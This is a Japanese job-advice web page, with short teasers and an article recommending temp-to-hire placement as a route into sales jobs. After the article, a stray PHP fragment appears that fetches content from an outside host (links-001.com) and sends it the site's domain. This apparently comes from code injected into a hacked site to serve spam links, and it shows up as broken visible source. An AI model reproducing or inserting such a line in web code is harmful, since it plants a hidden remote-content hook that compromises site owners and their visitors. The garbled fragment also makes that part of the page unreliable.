前へ
次へ

不動産営業の求人に応募して転職を目指す

不動産営業の求人をよく見かけることでしょう。
不動産営業は賃貸の営業であるのかそれともマンショ

more

転職するなら営業の求人を要確認

営業の求人を転職時に確認して欲しいのは「やりがい」があるからです。
人事・事務・生産などさまざ

more

転職で営業の求人に応募する時は第一印象が大事

転職で営業職の求人に応募する時には、第一印象が大事です。
営業の仕事は、契約をしてもらうために

more

転職する際に紹介予定の営業の求人に応募

営業の求人は、選択肢は複数あります。
転職活動している方々は、正社員の求人に注目している事も多いです。
将来的な安定性などに注目して、正社員の求人を探している方も少なくありません。
ただ正社員の営業の求人は、全体的にハードルは高いです。
状況に応じて、紹介予定などの働き方も検討してみると良いでしょう。
紹介予定という形で営業の求人に応募する方が、かえってスムーズに転職できる事もあります。
紹介予定とは、しばらくの間は派遣で勤務する働き方になります。
そもそも会社には、必ずといって良いほど試用期間があります。
2ヶ月や3ヶ月ぐらいはアルバイトとして働き、正社員で長期的に働けるかどうかを見極める訳です。
紹介予定の場合は、その2ヶ月や3ヶ月ぐらいは派遣社員として働く事になります。
とりあえず数ヶ月ほどは派遣として働いてみて、長期でも問題なく働けるかどうか確かめてみる訳です。
指定の期間が経過すれば、たいてい面談が行われます。
派遣スタッフと出向先の担当者が面接を行い、お互いに問題ないかどうか意思確認する訳です。
問題なければ、改めて営業マンとして正式採用されます。
その働き方にメリットを感じて、紹介予定の営業の求人に応募している方も多いです。
というのも多くの方は、転職先は慎重に見極めたいと考えています。
上記のように3ヶ月ぐらいは働いてみれば、問題ない会社かどうかを見極められる事も多いです。
また紹介予定として営業の求人に応募する方が、正式採用される確率が高いという声も多いです。
派遣会社と出向先との信頼関係などがあり、本人が直接営業の求人に応募するよりは、採用されやすいケースも多々あります。
ですから転職活動するなら、かえって紹介予定で応募する方が効率的な事もあります。
一見すると遠回りに思われるかもしれませんが、良い形で転職したいなら紹介予定も検討してみると良いでしょう。
実際、紹介予定として求人に応募して、成功している方も多いです。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top